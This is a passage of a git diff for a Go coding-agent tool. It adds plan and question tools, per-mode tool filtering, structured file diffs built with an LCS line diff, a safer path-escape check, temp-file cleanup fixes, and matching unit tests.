+		result = util.TruncateString(result, maxBytes) + fmt.Sprintf("\n... (truncated, total %d lines)", len(lines))
 	}
 
 	return NewTextToolResult(result), nil
diff --git a/internal/tools/tool.go b/internal/tools/tool.go
index 1206d73..7624a29 100644
--- a/internal/tools/tool.go
+++ b/internal/tools/tool.go
@@ -11,6 +11,7 @@ import (
 
 	"github.com/startvibecoding/vibecoding/internal/provider"
 	"github.com/startvibecoding/vibecoding/internal/sandbox"
+	"github.com/startvibecoding/vibecoding/internal/skills"
 )
 
 // writeFileAtomic writes data to path atomically using a temporary file and rename.
@@ -34,17 +35,17 @@ func writeFileAtomic(path string, data []byte) error {
 	}
 	tmpPath := tmp.Name()
 
-	// Clean up temp file on any error
-	defer os.Remove(tmpPath)
-
 	if _, err := tmp.Write(data); err != nil {
 		tmp.Close()
+		os.Remove(tmpPath)
 		return err
 	}
 	if err := tmp.Close(); err != nil {
+		os.Remove(tmpPath)
 		return err
 	}
 	if err := os.Chmod(tmpPath, perm); err != nil {
+		os.Remove(tmpPath)
 		return err
 	}
 	return os.Rename(tmpPath, path)
@@ -55,6 +56,32 @@ func writeFileAtomic(path string, data []byte) error {
 type ToolResult struct {
 	Text     string                  // Plain text result (always populated for display/logging)
 	Contents []provider.ContentBlock // Rich content blocks (text + images) for the LLM
+	Diff     *FileDiff               // Optional structured file diff for UI/reporting
+	Plan     *TaskPlan               // Optional structured task plan for UI/reporting
+}
+
+// FileDiff describes a file change produced by a write-like tool.
+type FileDiff struct {
+	Path         string
+	Added        int
+	Deleted      int
+	AddedLines   []int
+	DeletedLines []int
+	Unified      string
+	Truncated    bool
+}
+
+// TaskPlan describes a structured task plan emitted by the plan tool.
+type TaskPlan struct {
+	Title string
+	Steps []PlanStep
+	Note  string
+}
+
+// PlanStep describes one step in a task plan.
+type PlanStep struct {
+	Title  string
+	Status string
 }
 
 // NewTextToolResult creates a plain text tool result.
@@ -62,6 +89,16 @@ func NewTextToolResult(text string) ToolResult {
 	return ToolResult{Text: text}
 }
 
+// NewDiffToolResult creates a text tool result with structured diff metadata.
+func NewDiffToolResult(text string, diff *FileDiff) ToolResult {
+	return ToolResult{Text: text, Diff: diff}
+}
+
+// NewPlanToolResult creates a text tool result with structured plan metadata.
+func NewPlanToolResult(text string, plan *TaskPlan) ToolResult {
+	return ToolResult{Text: text, Plan: plan}
+}
+
 // NewImageToolResult creates a tool result that includes an image.
 // text is the human-readable description, mimeType and base64Data are the image payload.
 func NewImageToolResult(text, mimeType, base64Data string) ToolResult {
@@ -106,20 +143,55 @@ func ToolDefinition(t Tool) provider.ToolDefinition {
 
 // Registry manages available tools.
 type Registry struct {
-	mu      sync.RWMutex
-	tools   map[string]Tool
-	order   []string
-	sandbox sandbox.Sandbox
-	workDir string
+	mu         sync.RWMutex
+	tools      map[string]Tool
+	order      []string
+	sandbox    sandbox.Sandbox
+	workDir    string
+	jobManager *JobManager
+	skillsMgr  *skills.Manager
 }
 
 // NewRegistry creates a new tool registry.
 func NewRegistry(workDir string, sb sandbox.Sandbox) *Registry {
 	return &Registry{
-		tools:   make(map[string]Tool),
-		workDir: workDir,
-		sandbox: sb,
+		tools:      make(map[string]Tool),
+		workDir:    workDir,
+		sandbox:    sb,
+		jobManager: NewJobManager(),
+	}
+}
+
+// RegistryConfig configures a Registry instance.
+type RegistryConfig struct {
+	WorkDir    string
+	Sandbox    sandbox.Sandbox
+	ToolFilter []string        // optional: only register these tools (empty = all)
+	SkillsMgr  *skills.Manager // optional: skills manager for skill_ref tool
+}
+
+// NewRegistryWithConfig creates a Registry with the given config.
+func NewRegistryWithConfig(cfg RegistryConfig) *Registry {
+	r := &Registry{
+		tools:      make(map[string]Tool),
+		workDir:    cfg.WorkDir,
+		sandbox:    cfg.Sandbox,
+		jobManager: NewJobManager(),
+		skillsMgr:  cfg.SkillsMgr,
+	}
+	if len(cfg.ToolFilter) == 0 {
+		r.RegisterDefaults()
+	} else {
+		r.RegisterFiltered(cfg.ToolFilter)
 	}
+	return r
+}
+
+// JobManager returns the registry's per-instance job manager.
+func (r *Registry) JobManager() *JobManager {
+	r.mu.RLock()
+	defer r.mu.RUnlock()
+	return r.jobManager
 }
 
 // Register adds a tool to the registry.
@@ -141,6 +213,22 @@ func (r *Registry) Get(name string) (Tool, bool) {
 	return t, ok
 }
 
+// Remove removes a tool by name. No-op if not found.
+func (r *Registry) Remove(name string) {
+	r.mu.Lock()
+	defer r.mu.Unlock()
+	if _, ok := r.tools[name]; ok {
+		delete(r.tools, name)
+		// Also remove from order
+		for i, n := range r.order {
+			if n == name {
+				r.order = append(r.order[:i], r.order[i+1:]...)
+				break
+			}
+		}
+	}
+}
+
 // All returns all registered tools in order.
 func (r *Registry) All() []Tool {
 	r.mu.RLock()
@@ -212,7 +300,8 @@ func (r *Registry) ResolvePath(path string) (string, error) {
 
 	// Validate: path must not escape workDir
 	workDir = filepath.Clean(workDir)
-	if !strings.HasPrefix(path, workDir) {
+	rel, err := filepath.Rel(workDir, path)
+	if err != nil || rel == ".." || strings.HasPrefix(rel, ".."+string(filepath.Separator)) {
 		return "", fmt.Errorf("path %s escapes working directory %s", path, workDir)
 	}
 
@@ -228,34 +317,80 @@ func (r *Registry) SetSandbox(sb sandbox.Sandbox) {
 
 // RegisterDefaults registers all default tools.
 func (r *Registry) RegisterDefaults() {
+	r.RegisterDefaultsWithPlanTool(true)
+}
+
+// RegisterDefaultsWithPlanTool registers all default tools, optionally including the plan tool.
+func (r *Registry) RegisterDefaultsWithPlanTool(enablePlanTool bool) {
 	r.Register(NewReadTool(r))
 	r.Register(NewLsTool(r))
 	r.Register(NewGrepTool(r))
 	r.Register(NewFindTool(r))
+	if enablePlanTool {
+		r.Register(NewPlanTool(r))
+	}
 	r.Register(NewWriteTool(r))
 	r.Register(NewEditTool(r))
-	bashTool := NewBashTool(r)
+	bashTool := NewBashToolWithJM(r, r.jobManager)
 	r.Register(bashTool)
 	r.Register(NewJobsTool(r, bashTool))
 	r.Register(NewKillTool(r, bashTool))
+	if r.skillsMgr != nil {
+		r.Register(NewSkillRefTool(r.skillsMgr))
+	}
+}
+
+// RegisterFiltered registers only the specified tools by name.
+func (r *Registry) RegisterFiltered(toolNames []string) {
+	allTools := map[string]func() Tool{
+		"read":  func() Tool { return NewReadTool(r) },
+		"ls":    func() Tool { return NewLsTool(r) },
+		"grep":  func() Tool { return NewGrepTool(r) },
+		"find":  func() Tool { return NewFindTool(r) },
+		"plan":  func() Tool { return NewPlanTool(r) },
+		"write": func() Tool { return NewWriteTool(r) },
+		"edit":  func() Tool { return NewEditTool(r) },
+	}
+	bashTool := NewBashToolWithJM(r, r.jobManager)
+	allTools["bash"] = func() Tool { return bashTool }
+	allTools["jobs"] = func() Tool { return NewJobsTool(r, bashTool) }
+	allTools["kill"] = func() Tool { return NewKillTool(r, bashTool) }
+	if r.skillsMgr != nil {
+		allTools["skill_ref"] = func() Tool { return NewSkillRefTool(r.skillsMgr) }
+	}
+
+	for _, name := range toolNames {
+		if factory, ok := allTools[name]; ok {
+			r.Register(factory())
+		}
+	}
 }
 
 // ModeTools returns tool definitions appropriate for the given mode.
 func (r *Registry) ModeTools(mode string) []provider.ToolDefinition {
 	switch mode {
 	case "plan":
-		// Plan mode: read-only tools
+		// Plan mode: read-only tools + any extras like question
 		var defs []provider.ToolDefinition
 		for _, t := range r.All() {
 			switch t.Name() {
-			case "read", "grep", "find", "ls":
+			case "read", "grep", "find", "ls", "plan":
+				defs = append(defs, ToolDefinition(t))
+			case "question":
 				defs = append(defs, ToolDefinition(t))
 			}
 		}
 		return defs
 	default:
-		// Agent/YOLO: all tools
-		return r.Definitions()
+		// Agent/YOLO: all tools except question (TUI-plan only)
+		var defs []provider.ToolDefinition
+		for _, t := range r.All() {
+			if t.Name() == "question" {
+				continue
+			}
+			defs = append(defs, ToolDefinition(t))
+		}
+		return defs
 	}
 }
 
diff --git a/internal/tools/tools_test.go b/internal/tools/tools_test.go
index a73aad6..01d57c5 100644
--- a/internal/tools/tools_test.go
+++ b/internal/tools/tools_test.go
@@ -3,6 +3,7 @@ package tools
 import (
 	"context"
 	"os"
+	"os/exec"
 	"path/filepath"
 	"strings"
 	"testing"
@@ -59,7 +60,7 @@ func TestRegisterDefaults(t *testing.T) {
 	r := NewRegistry("/tmp", sb)
 	r.RegisterDefaults()
 
-	expectedTools := []string{"read", "write", "edit", "bash", "jobs", "kill", "grep", "find", "ls"}
+	expectedTools := []string{"read", "write", "edit", "bash", "jobs", "kill", "grep", "find", "ls", "plan"}
 
 	for _, name := range expectedTools {
 		_, ok := r.Get(name)
@@ -69,6 +70,16 @@ func TestRegisterDefaults(t *testing.T) {
 	}
 }
 
+func TestRegisterDefaultsWithPlanToolDisabled(t *testing.T) {
+	sb := sandbox.NewNoneSandbox()
+	r := NewRegistry("/tmp", sb)
+	r.RegisterDefaultsWithPlanTool(false)
+
+	if _, ok := r.Get("plan"); ok {
+		t.Fatal("expected plan tool to be disabled")
+	}
+}
+
 func TestModeTools(t *testing.T) {
 	sb := sandbox.NewNoneSandbox()
 	r := NewRegistry("/tmp", sb)
@@ -92,6 +103,9 @@ func TestModeTools(t *testing.T) {
 	if planToolNames["write"] {
 		t.Error("expected no 'write' in plan mode")
 	}
+	if !planToolNames["plan"] {
+		t.Error("expected 'plan' in plan mode")
+	}
 
 	if planToolNames["bash"] {
 		t.Error("expected no 'bash' in plan mode")
@@ -99,8 +113,38 @@ func TestModeTools(t *testing.T) {
 
 	// Agent mode - all tools
 	agentTools := r.ModeTools("agent")
-	if len(agentTools) != 9 {
-		t.Errorf("expected 9 tools in agent mode, got %d", len(agentTools))
+	if len(agentTools) != 10 {
+		t.Errorf("expected 10 tools in agent mode, got %d", len(agentTools))
+	}
+}
+
+func TestPlanToolExecute(t *testing.T) {
+	sb := sandbox.NewNoneSandbox()
+	r := NewRegistry("/tmp", sb)
+	tool := NewPlanTool(r)
+
+	result, err := tool.Execute(context.Background(), map[string]any{
+		"title": "Ship feature",
+		"steps": []any{
+			map[string]any{"title": "Read code", "status": "done"},
+			map[string]any{"title": "Implement change", "status": "running"},
+		},
+		"note": "Keep scope small",
+	})
+	if err != nil {
+		t.Fatalf("unexpected error: %v", err)
+	}
+	if result.Plan == nil {
+		t.Fatal("expected structured plan")
+	}
+	if result.Plan.Title != "Ship feature" {
+		t.Fatalf("plan title = %q, want Ship feature", result.Plan.Title)
+	}
+	if len(result.Plan.Steps) != 2 || result.Plan.Steps[1].Status != "running" {
+		t.Fatalf("plan steps = %#v", result.Plan.Steps)
+	}
+	if !strings.Contains(result.Text, "[running] Implement change") {
+		t.Fatalf("expected formatted plan text, got: %s", result.Text)
 	}
 }
 
@@ -205,6 +249,22 @@ func TestReadToolImage(t *testing.T) {
 	}
 }
 
+func TestReadToolImageTooLarge(t *testing.T) {
+	tmpDir := t.TempDir()
+	tmpFile := filepath.Join(tmpDir, "large.png")
+	if err := os.WriteFile(tmpFile, make([]byte, maxImageFileBytes+1), 0644); err != nil {
+		t.Fatal(err)
+	}
+
+	r := NewRegistry(tmpDir, sandbox.NewNoneSandbox())
+	tool := NewReadTool(r)
+
+	_, err := tool.Execute(context.Background(), map[string]any{"path": "large.png"})
+	if err == nil || !strings.Contains(err.Error(), "image file too large") {
+		t.Fatalf("err = %v, want image file too large", err)
+	}
+}
+
 func TestWriteTool(t *testing.T) {
 	sb := sandbox.NewNoneSandbox()
 	r := NewRegistry("/tmp", sb)
@@ -238,6 +298,15 @@ func TestWriteToolExecute(t *testing.T) {
 	if result.Text == "" {
 		t.Error("expected non-empty result")
 	}
+	if result.Diff == nil {
+		t.Fatal("expected structured diff")
+	}
+	if result.Diff.Added != 1 || result.Diff.Deleted != 0 {
+		t.Fatalf("diff = +%d -%d, want +1 -0", result.Diff.Added, result.Diff.Deleted)
+	}
+	if !strings.Contains(result.Diff.Unified, "+Hello, World!") {
+		t.Fatalf("expected unified diff to include added content, got: %s", result.Diff.Unified)
+	}
 
 	// Verify file was written
 	content, err := os.ReadFile(filepath.Join(tmpDir, "test.txt"))
@@ -290,6 +359,18 @@ func TestEditToolExecute(t *testing.T) {
 	if result.Text == "" {
 		t.Error("expected non-empty result")
 	}
+	if result.Diff == nil {
+		t.Fatal("expected structured diff")
+	}
+	if result.Diff.Added != 1 || result.Diff.Deleted != 1 {
+		t.Fatalf("diff = +%d -%d, want +1 -1", result.Diff.Added, result.Diff.Deleted)
+	}
+	if !strings.Contains(result.Text, "Diff: +1 -1") {
+		t.Fatalf("expected diff summary in result text, got: %s", result.Text)
+	}
+	if !strings.Contains(result.Diff.Unified, "-Hello, World!") || !strings.Contains(result.Diff.Unified, "+Hello, Go!") {
+		t.Fatalf("expected unified diff replacement, got: %s", result.Diff.Unified)
+	}
 
 	// Verify edit was applied
 	content, err := os.ReadFile(tmpFile)
@@ -527,6 +608,31 @@ func TestGrepToolExecute(t *testing.T) {
 	}
 }
 
+func TestNativeGrepFallbackExecute(t *testing.T) {
+	if _, err := exec.LookPath("grep"); err != nil {
+		t.Skip("system grep not available")
+	}
+
+	tmpDir := t.TempDir()
+	if err := os.WriteFile(filepath.Join(tmpDir, "one.go"), []byte("package main\nfunc Hello() {}\n"), 0644); err != nil {
+		t.Fatal(err)
+	}
+	if err := os.WriteFile(filepath.Join(tmpDir, "two.txt"), []byte("Hello text\n"), 0644); err != nil {
+		t.Fatal(err)
+	}
+
+	result, err := executeNativeGrep(context.Background(), "Hello", tmpDir, "*.go", 10)
+	if err != nil {
+		t.Fatalf("unexpected error: %v", err)
+	}
+	if !strings.Contains(result.Text, "one.go") {
+		t.Fatalf("expected .go match, got: %s", result.Text)
+	}
+	if strings.Contains(result.Text, "two.txt") {
+		t.Fatalf("include filter should exclude two.txt, got: %s", result.Text)
+	}
+}
+
 func TestFindTool(t *testing.T) {
 	sb := sandbox.NewNoneSandbox()
 	r := NewRegistry("/tmp", sb)
@@ -564,6 +670,67 @@ func TestFindToolExecute(t *testing.T) {
 	}
 }
 
+func TestNativeFindFallbackExecute(t *testing.T) {
+	if _, err := exec.LookPath("find"); err != nil {
+		t.Skip("system find not available")
+	}
+
+	tmpDir := t.TempDir()
+	nested := filepath.Join(tmpDir, "nested")
+	if err := os.MkdirAll(nested, 0755); err != nil {
+		t.Fatal(err)
+	}
+	if err := os.WriteFile(filepath.Join(tmpDir, "root.go"), []byte("package root\n"), 0644); err != nil {
+		t.Fatal(err)
+	}
+	if err := os.WriteFile(filepath.Join(nested, "nested.go"), []byte("package nested\n"), 0644); err != nil {
+		t.Fatal(err)
+	}
+
+	result, err := executeNativeFind(context.Background(), "*.go", tmpDir, 1, 10)
+	if err != nil {
+		t.Fatalf("unexpected error: %v", err)
+	}
+	if !strings.Contains(result.Text, "root.go") {
+		t.Fatalf("expected root.go, got: %s", result.Text)
+	}
+	if strings.Contains(result.Text, "nested.go") {
+		t.Fatalf("maxDepth should exclude nested.go, got: %s", result.Text)
+	}
+}
+
+func TestFindToolExecuteUsesNativeGlob(t *testing.T) {
+	tmpDir := t.TempDir()
+	nestedDir := filepath.Join(tmpDir, "nested")
+	if err := os.MkdirAll(nestedDir, 0755); err != nil {
+		t.Fatalf("mkdir nested: %v", err)
+	}
+	if err := os.WriteFile(filepath.Join(nestedDir, "test.txt"), []byte("Hello"), 0644); err != nil {
+		t.Fatalf("write nested file: %v", err)
+	}
+	if err := os.WriteFile(filepath.Join(tmpDir, "test.txt"), []byte("Hello"), 0644); err != nil {
+		t.Fatalf("write root file: %v", err)
+	}
+
+	sb := sandbox.NewNoneSandbox()
+	r := NewRegistry(tmpDir, sb)
+	tool := NewFindTool(r)
+
+	result, err := tool.Execute(context.Background(), map[string]any{
+		"pattern":  "**/*.txt",
+		"path":     ".",
+		"maxDepth": float64(2),
+	})
+
+	if err != nil {
+		t.Fatalf("unexpected error: %v", err)
+	}
+
+	if !strings.Contains(result.Text, filepath.Join("nested", "test.txt")) {
+		t.Fatalf("result = %q, want nested/test.txt", result.Text)
+	}
+}
+
 func TestLsTool(t *testing.T) {
 	sb := sandbox.NewNoneSandbox()
 	r := NewRegistry("/tmp", sb)
@@ -627,8 +794,8 @@ func TestDefinitions(t *testing.T) {
 
 	defs := r.Definitions()
 
-	if len(defs) != 9 {
-		t.Errorf("expected 9 definitions, got %d", len(defs))
+	if len(defs) != 10 {
+		t.Errorf("expected 10 definitions, got %d", len(defs))
 	}
 }
 
@@ -639,7 +806,188 @@ func TestAll(t *testing.T) {
 
 	all := r.All()
 
-	if len(all) != 9 {
-		t.Errorf("expected 9 tools, got %d", len(all))
+	if len(all) != 10 {
+		t.Errorf("expected 10 tools, got %d", len(all))
+	}
+}
+
+// TestWriteFileAtomic_SuccessNoTmpFile verifies writeFileAtomic does not
+// leave a temp file on success.
+func TestWriteFileAtomic_SuccessNoTmpFile(t *testing.T) {
+	tmpDir := t.TempDir()
+	path := filepath.Join(tmpDir, "output.txt")
+
+	if err := writeFileAtomic(path, []byte("hello world")); err != nil {
+		t.Fatalf("unexpected error: %v", err)
+	}
+
+	// Verify content
+	data, err := os.ReadFile(path)
+	if err != nil {
+		t.Fatalf("read file: %v", err)
+	}
+	if string(data) != "hello world" {
+		t.Errorf("content = %q, want 'hello world'", string(data))
+	}
+
+	// Verify no .tmp-* files left
+	entries, _ := os.ReadDir(tmpDir)
+	for _, e := range entries {
+		if strings.HasPrefix(e.Name(), ".tmp-") {
+			t.Errorf("leftover temp file: %s", e.Name())
+		}
+	}
+}
+
+// TestWriteFileAtomic_ErrorCleansUp verifies writeFileAtomic cleans up
+// the temp file on write error.
+func TestWriteFileAtomic_ErrorCleansUp(t *testing.T) {
+	tmpDir := t.TempDir()
+	path := filepath.Join(tmpDir, "subdir", "output.txt")
+
+	// Write to a path where parent dir creation fails (file blocks mkdir)
+	blocker := filepath.Join(tmpDir, "subdir")
+	os.WriteFile(blocker, []byte("block"), 0644) // file, not dir
+
+	err := writeFileAtomic(path, []byte("data"))
+	if err == nil {
+		t.Log("expected error writing to blocked path")
+	}
+
+	// No .tmp-* files should remain
+	entries, _ := os.ReadDir(tmpDir)
+	for _, e := range entries {
+		if strings.HasPrefix(e.Name(), ".tmp-") {
+			t.Errorf("leftover temp file: %s", e.Name())
+		}
+	}
+}
+
+// --- QuestionTool tests ---
+
+func TestQuestionToolMetadata(t *testing.T) {
+	sb := sandbox.NewNoneSandbox()
+	r := NewRegistry("/tmp", sb)
+	qt := NewQuestionTool(r)
+
+	if qt.Name() != "question" {
+		t.Errorf("name = %q, want 'question'", qt.Name())
+	}
+	if qt.Description() == "" {
+		t.Error("expected non-empty description")
+	}
+	if qt.Parameters() == nil {
+		t.Error("expected non-nil parameters")
+	}
+	if qt.PromptSnippet() == "" {
+		t.Error("expected non-empty prompt snippet")
+	}
+	if len(qt.PromptGuidelines()) == 0 {
+		t.Error("expected non-empty guidelines")
+	}
+}
+
+func TestQuestionTool_InPlanModeOnly(t *testing.T) {
+	sb := sandbox.NewNoneSandbox()
+	r := NewRegistry("/tmp", sb)
+	r.RegisterDefaults()
+	r.Register(NewQuestionTool(r))
+
+	planTools := r.ModeTools("plan")
+	planNames := make(map[string]bool)
+	for _, td := range planTools {
+		planNames[td.Name] = true
+	}
+	if !planNames["question"] {
+		t.Error("expected 'question' in plan mode")
+	}
+
+	agentTools := r.ModeTools("agent")
+	agentNames := make(map[string]bool)
+	for _, td := range agentTools {
+		agentNames[td.Name] = true
+	}
+	if agentNames["question"] {
+		t.Error("did not expect 'question' in agent mode")
+	}
+
+	yoloTools := r.ModeTools("yolo")
+	yoloNames := make(map[string]bool)
+	for _, td := range yoloTools {
+		yoloNames[td.Name] = true
+	}
+	if yoloNames["question"] {
+		t.Error("did not expect 'question' in yolo mode")
+	}
+}
+
+// mockAsker implements QuestionAsker for testing.
+type mockAsker struct {
+	lastQuestion string
+	lastOptions  []string
+	lastContext  string
+	answer       string
+}
+
+func (m *mockAsker) AskQuestion(_ context.Context, question string, options []string, ctx string) string {
+	m.lastQuestion = question
+	m.lastOptions = options
+	m.lastContext = ctx
+	return m.answer
+}
+
+func TestQuestionTool_Execute(t *testing.T) {
+	sb := sandbox.NewNoneSandbox()
+	r := NewRegistry("/tmp", sb)
+	qt := NewQuestionTool(r)
+
+	asker := &mockAsker{answer: "Option B"}
+	ctx := ContextWithQuestionAsker(context.Background(), asker)
+
+	result, err := qt.Execute(ctx, map[string]any{
+		"question": "Which approach do you prefer?",
+		"options":  []any{"Option A", "Option B", "Option C"},
+		"context":  "We need to choose an architecture.",
+	})
+	if err != nil {
+		t.Fatalf("unexpected error: %v", err)
+	}
+	if !strings.Contains(result.Text, "Option B") {
+		t.Errorf("result = %q, expected to contain 'Option B'", result.Text)
+	}
+	if asker.lastQuestion != "Which approach do you prefer?" {
+		t.Errorf("question = %q", asker.lastQuestion)
+	}
+	if len(asker.lastOptions) != 3 {
+		t.Errorf("options count = %d, want 3", len(asker.lastOptions))
+	}
+}
+
+func TestQuestionTool_ExecuteMissingQuestion(t *testing.T) {
+	sb := sandbox.NewNoneSandbox()
+	r := NewRegistry("/tmp", sb)
+	qt := NewQuestionTool(r)
+
+	ctx := ContextWithQuestionAsker(context.Background(), &mockAsker{})
+
+	_, err := qt.Execute(ctx, map[string]any{
+		"options": []any{"A"},
+	})
+	if err == nil {
+		t.Fatal("expected error for missing question")
+	}
+}
+
+func TestQuestionTool_ExecuteMissingAsker(t *testing.T) {
+	sb := sandbox.NewNoneSandbox()
+	r := NewRegistry("/tmp", sb)
+	qt := NewQuestionTool(r)
+
+	_, err := qt.Execute(context.Background(), map[string]any{
+		"question": "Test?",
+		"options":  []any{"A"},
+	})
+	if err == nil {
+		t.Fatal("expected error for missing asker in context")
 	}
 }
diff --git a/internal/tools/write.go b/internal/tools/write.go
index 28afb98..3e69118 100644
--- a/internal/tools/write.go
+++ b/internal/tools/write.go
@@ -4,6 +4,8 @@ import (
 	"context"
 	"encoding/json"
 	"fmt"
+	"os"
+	"strings"
 )
 
 // WriteTool writes content to files.
@@ -63,10 +65,273 @@ func (t *WriteTool) Execute(ctx context.Context, params map[string]any) (ToolRes
 		return ToolResult{}, fmt.Errorf("invalid path: %w", err)
 	}
 
+	oldContent := ""
+	if data, err := os.ReadFile(path); err == nil {
+		oldContent = string(data)
+	}
+	diff := BuildFileDiff(path, oldContent, content)
+
 	// Write file atomically, preserving existing permissions
 	if err := writeFileAtomic(path, []byte(content)); err != nil {
 		return ToolResult{}, fmt.Errorf("write file: %w", err)
 	}
 
-	return NewTextToolResult(fmt.Sprintf("File written: %s (%d bytes)", path, len(content))), nil
+	return NewDiffToolResult(fmt.Sprintf("File written: %s (%d bytes)\n%s", path, len(content), formatFileDiffSummary(diff)), diff), nil
+}
+
+func formatWriteDiffSummary(oldContent, newContent string) string {
+	return formatFileDiffSummary(BuildFileDiff("", oldContent, newContent))
+}
+
+func formatFileDiffSummary(diff *FileDiff) string {
+	if diff == nil {
+		return "Diff: +0 -0\n- lines: none\n+ lines: none"
+	}
+	suffix := ""
+	if diff.Truncated {
+		suffix = " (large file; line ranges approximate)"
+	}
+	return fmt.Sprintf("Diff: +%d -%d%s\n- lines: %s\n+ lines: %s",
+		diff.Added,
+		diff.Deleted,
+		suffix,
+		formatLineRanges(diff.DeletedLines),
+		formatLineRanges(diff.AddedLines),
+	)
+}
+
+// BuildFileDiff returns a compact, structured line diff for display and audit.
+func BuildFileDiff(path, oldContent, newContent string) *FileDiff {
+	oldLines := splitDiffLines(oldContent)
+	newLines := splitDiffLines(newContent)
+	deleted, added := diffLineChanges(oldLines, newLines)
+	truncated := len(oldLines)*len(newLines) > 200000
+	return &FileDiff{
+		Path:         path,
+		Added:        len(added),
+		Deleted:      len(deleted),
+		AddedLines:   added,
+		DeletedLines: deleted,
+		Unified:      formatUnifiedDiff(path, oldLines, newLines, deleted, added, truncated),
+		Truncated:    truncated,
+	}
+}
+
+func splitDiffLines(content string) []string {
+	if content == "" {
+		return nil
+	}
+	return strings.Split(strings.TrimSuffix(content, "\n"), "\n")
+}
+
+func diffLineChanges(oldLines, newLines []string) ([]int, []int) {
+	if len(oldLines) == 0 && len(newLines) == 0 {
+		return nil, nil
+	}
+	if len(oldLines)*len(newLines) > 200000 {
+		return allLineNumbers(len(oldLines)), allLineNumbers(len(newLines))
+	}
+
+	lcs := make([][]int, len(oldLines)+1)
+	for i := range lcs {
+		lcs[i] = make([]int, len(newLines)+1)
+	}
+	for i := len(oldLines) - 1; i >= 0; i-- {
+		for j := len(newLines) - 1; j >= 0; j-- {
+			if oldLines[i] == newLines[j] {
+				lcs[i][j] = lcs[i+1][j+1] + 1
+			} else if lcs[i+1][j] >= lcs[i][j+1] {
+				lcs[i][j] = lcs[i+1][j]
+			} else {
+				lcs[i][j] = lcs[i][j+1]
+			}
+		}
+	}
+
+	var deleted, added []int
+	i, j := 0, 0
+	for i < len(oldLines) && j < len(newLines) {
+		switch {
+		case oldLines[i] == newLines[j]:
+			i++
+			j++
+		case lcs[i+1][j] >= lcs[i][j+1]:
+			deleted = append(deleted, i+1)
+			i++
+		default:
+			added = append(added, j+1)
+			j++
+		}
+	}
+	for ; i < len(oldLines); i++ {
+		deleted = append(deleted, i+1)
+	}
+	for ; j < len(newLines); j++ {
+		added = append(added, j+1)
+	}
+	return deleted, added
+}
+
+func formatUnifiedDiff(path string, oldLines, newLines []string, deleted, added []int, truncated bool) string {
+	var sb strings.Builder
+	oldPath := path
+	newPath := path
+	if oldPath == "" {
+		oldPath = "old"
+		newPath = "new"
+	}
+	sb.WriteString("--- " + oldPath + "\n")
+	sb.WriteString("+++ " + newPath + "\n")
+	if truncated {
+		sb.WriteString("@@ large file diff omitted @@\n")
+		sb.WriteString(fmt.Sprintf("-%s\n", formatLineRanges(deleted)))
+		sb.WriteString(fmt.Sprintf("+%s\n", formatLineRanges(added)))
+		return sb.String()
+	}
+	if len(deleted) == 0 && len(added) == 0 {
+		return sb.String()
+	}
+	deletedSet := lineSet(deleted)
+	addedSet := lineSet(added)
+	records := makeDiffRecords(oldLines, newLines, deletedSet, addedSet)
+	for _, hunk := range selectDiffHunks(records, 3) {
+		oldStart, oldCount, newStart, newCount := hunkRanges(records[hunk.start:hunk.end])
+		sb.WriteString(fmt.Sprintf("@@ -%d,%d +%d,%d @@\n", oldStart, oldCount, newStart, newCount))
+		for _, record := range records[hunk.start:hunk.end] {
+			sb.WriteByte(record.kind)
+			sb.WriteString(record.text)
+			sb.WriteByte('\n')
+		}
+	}
+	return sb.String()
+}
+
+type diffRecord struct {
+	kind    byte
+	text    string
+	oldLine int
+	newLine int
+}
+
+type diffHunk struct {
+	start int
+	end   int
+}
+
+func makeDiffRecords(oldLines, newLines []string, deletedSet, addedSet map[int]bool) []diffRecord {
+	var records []diffRecord
+	oldIdx, newIdx := 1, 1
+	for oldIdx <= len(oldLines) || newIdx <= len(newLines) {
+		switch {
+		case oldIdx <= len(oldLines) && deletedSet[oldIdx]:
+			records = append(records, diffRecord{kind: '-', text: oldLines[oldIdx-1], oldLine: oldIdx})
+			oldIdx++
+		case newIdx <= len(newLines) && addedSet[newIdx]:
+			records = append(records, diffRecord{kind: '+', text: newLines[newIdx-1], newLine: newIdx})
+			newIdx++
+		case oldIdx <= len(oldLines) && newIdx <= len(newLines):
+			records = append(records, diffRecord{kind: ' ', text: oldLines[oldIdx-1], oldLine: oldIdx, newLine: newIdx})
+			oldIdx++
+			newIdx++
+		case oldIdx <= len(oldLines):
+			records = append(records, diffRecord{kind: '-', text: oldLines[oldIdx-1], oldLine: oldIdx})
+			oldIdx++
+		case newIdx <= len(newLines):
+			records = append(records, diffRecord{kind: '+', text: newLines[newIdx-1], newLine: newIdx})
+			newIdx++
+		}
+	}
+	return records
+}
+
+func selectDiffHunks(records []diffRecord, contextLines int) []diffHunk {
+	var hunks []diffHunk
+	for i, record := range records {
+		if record.kind == ' ' {
+			continue
+		}
+		start := i - contextLines
+		if start < 0 {
+			start = 0
+		}
+		end := i + contextLines + 1
+		if end > len(records) {
+			end = len(records)
+		}
+		if len(hunks) > 0 && start <= hunks[len(hunks)-1].end {
+			if end > hunks[len(hunks)-1].end {
+				hunks[len(hunks)-1].end = end
+			}
+			continue
+		}
+		hunks = append(hunks, diffHunk{start: start, end: end})
+	}
+	return hunks
+}
+
+func hunkRanges(records []diffRecord) (int, int, int, int) {
+	oldStart, newStart := 0, 0
+	oldCount, newCount := 0, 0
+	for _, record := range records {
+		if record.oldLine > 0 {
+			if oldStart == 0 {
+				oldStart = record.oldLine
+			}
+			oldCount++
+		}
+		if record.newLine > 0 {
+			if newStart == 0 {
+				newStart = record.newLine
+			}
+			newCount++
+		}
+	}
+	if oldStart == 0 {
+		oldStart = 1
+	}
+	if newStart == 0 {
+		newStart = 1
+	}
+	return oldStart, oldCount, newStart, newCount
+}
+
+func lineSet(lines []int) map[int]bool {
+	result := make(map[int]bool, len(lines))
+	for _, line := range lines {
+		result[line] = true
+	}
+	return result
+}
+
+func allLineNumbers(count int) []int {
+	lines := make([]int, count)
+	for i := range lines {
+		lines[i] = i + 1
+	}
+	return lines
+}
+
+func formatLineRanges(lines []int) string {
+	if len(lines) == 0 {
+		return "none"
+	}
+	var ranges []string
+	start, prev := lines[0], lines[0]
+	for _, line := range lines[1:] {
+		if line == prev+1 {
+			prev = line
+			continue
+		}
+		ranges = append(ranges, formatLineRange(start, prev))
+		start, prev = line, line
+	}
+	ranges = append(ranges, formatLineRange(start, prev))
+	return strings.Join(ranges, ",")
+}
+
+func formatLineRange(start, end int) string {
+	if start == end {
+		return fmt.Sprintf("%d", start)
+	}
+	return fmt.Sprintf("%d-%d", start, end)
 }
diff --git a/internal/tui/agent_events.go b/internal/tui/agent_events.go
new file mode 100644
index 0000000..9b9c353
